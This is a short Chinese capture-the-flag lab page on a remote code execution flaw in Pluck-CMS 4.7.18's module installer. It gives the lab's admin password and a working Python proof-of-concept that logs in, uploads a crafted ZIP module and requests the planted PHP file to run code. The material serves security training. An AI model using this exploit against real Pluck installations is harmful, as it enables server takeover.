靶场介绍
Pluck-CMS v4.7.18 中的 /inc/modules_install.php 组件,攻击者可以通过上传一个精心制作的 ZIP 文件来执行任意代码。
这个靶场后台密码是admin123,如果你想试试,可以再继续试一下
开启靶场
POC脚本
## pip install requests_toolbelt
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
url="http://eci-2ze5onkv4tv72l3rr3e9.cloudeci1.ichunqiu.com/"
file_path ="miri.zip"
login_url = url+"/login.php"
upload_url = url+"/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin123","bogus": "","submit": "Log in"}
multipart_data = MultipartEncoder(
fields={
"sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),
"submit": "Upload"
}
)
session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)
if login_response.status_code == 200:
print("Login account")
upload_headers = {
"Referer": upload_url,
"Content-Type": multipart_data.content_type
}
upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)
if upload_response.status_code == 200:
print("ZIP file download.")
else:
print("ZIP file download error. Response code:", upload_response.status_code)
else:
print("Login problem. response code:", login_response.status_code)
rce_url=url+"/data/modules/mirabbas/miri.php"
rce=requests.get(rce_url)
print(rce.text)
得到flag